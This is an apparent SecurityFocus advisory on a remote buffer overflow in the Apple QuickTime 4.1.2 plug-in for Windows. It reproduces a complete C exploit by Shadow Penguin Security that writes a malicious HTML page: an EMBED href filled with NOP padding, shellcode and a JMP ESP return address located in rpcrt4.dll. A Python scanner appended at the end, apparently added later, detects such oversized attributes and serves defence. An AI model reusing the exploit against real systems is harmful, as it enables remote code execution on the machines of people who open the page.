source: https://www.securityfocus.com/bid/2328/info

The Apple QuickTime plug-in for Windows is vulnerable to a remote buffer overflow. A maliciously constructed link in a remote HTML document, in which an EMBED tag carries an overlong attribute value, could permit execution of hostile code.

/*====================================================================
  Apple QuickTime 4.1.2 plug-in exploit
  The Shadow Penguin Security (http://shadowpenguin.backsection.net)
  Written by UNYUN (shadowpenguin@backsection.net)
  ====================================================================
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

#define MOV_FILE    "c:\\program files\\quicktime\\sample.mov"
#define HEIGHT      60
#define WIDTH       60
#define TARGET      "QUICKTIMEPLAYER"
/* HTML template: the second %s receives the oversized href value */
#define FILE_IMAGE  \
    "<html><embed src=\"%s\" href=\"%s\" " \
    "width=%d height=%d autoplay=\"true\" " \
    "target=\"%s\"><br></html>"
#define BUFSIZE     730
#define RET         684
#define ESP_TGT     "rpcrt4.dll"
#define JMPESP_1    0xff
#define JMPESP_2    0xe4
#define NOP         0x90

unsigned char exploit_code[200] = {
    0x33,0xC0,0x40,0x40,0x40,0x40,0x40,0x50,
    0x50,0x90,0xB8,0x2D,0x23,0xF5,0xBF,0x48,
    0xFF,0xD0,0x00,
};

int main(int argc, char *argv[])
{
    FILE *fp;
    char buf[BUFSIZE];
    unsigned int i, pretadr, p, ip, kp;
    MEMORY_BASIC_INFORMATION meminfo;

    if (argc < 2) {
        printf("usage : %s Output_HTML-fileName [Sample .mov file]\n", argv[0]);
        exit(1);
    }
    if ((void *)(kp = (unsigned int)LoadLibrary(ESP_TGT)) == NULL) {
        printf("%s is not found.\n", ESP_TGT);
        exit(1);
    }
    /* Search the loaded module's region for a suitable return address,
       skipping any address that contains a zero byte */
    VirtualQuery((void *)kp, &meminfo, sizeof(MEMORY_BASIC_INFORMATION));
    pretadr = 0;
    for (i = 0; i < meminfo.RegionSize; i++) {
        p = kp + i;
        if ((p & 0xff) == 0 || ((p >> 8) & 0xff) == 0 ||
            ((p >> 16) & 0xff) == 0 || ((p >> 24) & 0xff) == 0)
            continue;
        if (*((unsigned char *)p) == JMPESP_1 &&
            *(((unsigned char *)p) + 1) == JMPESP_2)
            pretadr = p;
    }
    if ((fp = fopen(argv[1], "wb")) == NULL) {
        printf("File write error \"%s\"\n", argv[1]);
        exit(1);
    }
    /* Fill the attribute value, place the code, then patch in the address */
    memset(buf, NOP, BUFSIZE);
    memcpy(buf + 700 - 12, exploit_code, strlen((char *)exploit_code));
    buf[BUFSIZE - 2] = 0;
    ip = pretadr;
    printf("EIP=%x\n", ip);
    buf[RET]     = ip & 0xff;
    buf[RET + 1] = (ip >> 8) & 0xff;
    buf[RET + 2] = (ip >> 16) & 0xff;
    buf[RET + 3] = (ip >> 24) & 0xff;
    if (argc == 2)
        fprintf(fp, FILE_IMAGE, MOV_FILE, buf, WIDTH, HEIGHT, TARGET);
    else
        fprintf(fp, FILE_IMAGE, argv[2], buf, WIDTH, HEIGHT, TARGET);
    fclose(fp);
    printf("Done.\n");
    return 0;
}

-----
UNYUN
% The Shadow Penguin Security [ http://shadowpenguin.backsection.net ]
  shadowpenguin@backsection.net (SPS-Official)
  unyun@shadowpenguin.org (Personal)
% eEye Digital Security Team [ http://www.eEye.com ]
  unyun@eEye.com
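The advisory above describes the trigger as an EMBED tag whose attribute value is far longer than the plug-in expects. A defender-side check for that pattern, added here as an example (it is not code from SecurityFocus, Shadow Penguin Security or the original post): it parses an HTML document with Python's html.parser and flags any &lt;embed&gt; attribute value that is overlong or contains non-printable bytes, which is how filler and address bytes in a payload of this kind show up in the page text. The 256-byte threshold, the MAX_ATTR_LEN name, the EmbedAttrScanner class and the scan_html helper are assumptions of this example, as is the constructed sample document at the bottom.

```python
"""Flag <embed> tags whose attribute values look like overflow payloads:
overlong, or carrying non-printable bytes. Example code, not part of the
original advisory or exploit."""
from html.parser import HTMLParser

# Assumed threshold. Legitimate src/href values for a movie plug-in are short;
# the advisory's payload needs a value of roughly 730 bytes.
MAX_ATTR_LEN = 256


class EmbedAttrScanner(HTMLParser):
    """Collect (attribute name, reasons) for suspicious <embed> attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser already lowercases tag and attribute names.
        if tag != "embed":
            return
        for name, value in attrs:
            if value is None:          # bare attribute such as <embed hidden>
                continue
            reasons = []
            if len(value) > MAX_ATTR_LEN:
                reasons.append(f"length {len(value)} exceeds {MAX_ATTR_LEN}")
            nonprint = sum(1 for ch in value if not ch.isprintable())
            if nonprint:
                reasons.append(f"{nonprint} non-printable characters")
            if reasons:
                self.findings.append((name, reasons))


def scan_html(data: bytes):
    """Return a list of (attribute name, reasons) for the suspicious
    <embed> attributes found in the raw HTML bytes."""
    # latin-1 maps every byte to one code point, so payload bytes such as 0x90
    # survive decoding (as C1 controls, which str.isprintable() rejects)
    # instead of raising a UnicodeDecodeError.
    text = data.decode("latin-1")
    parser = EmbedAttrScanner()
    parser.feed(text)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    # Constructed sample: a benign page and a page with an oversized href
    # made of 700 filler bytes followed by four placeholder address bytes.
    benign = b'<html><embed src="movie.mov" width=60 height=60></html>'
    suspect = (b'<html><embed src="x.mov" href="' + b"\x90" * 700 + b"ABCD"
               + b'" width=60 height=60></html>')
    for label, doc in (("benign", benign), ("suspect", suspect)):
        for attr, reasons in scan_html(doc) or [("-", ["no findings"])]:
            print(f"{label}: {attr}: {'; '.join(reasons)}")
```

Run this over fetched page bodies (a proxy log extract or a mail gateway's HTML parts) rather than on the rendering client: the point is to spot the shape of the payload before a vulnerable plug-in parses it. The threshold is deliberately generous; if a deployment legitimately uses long data: URLs in src, raise MAX_ATTR_LEN or exempt that attribute rather than the non-printable-byte rule, which is the stronger signal.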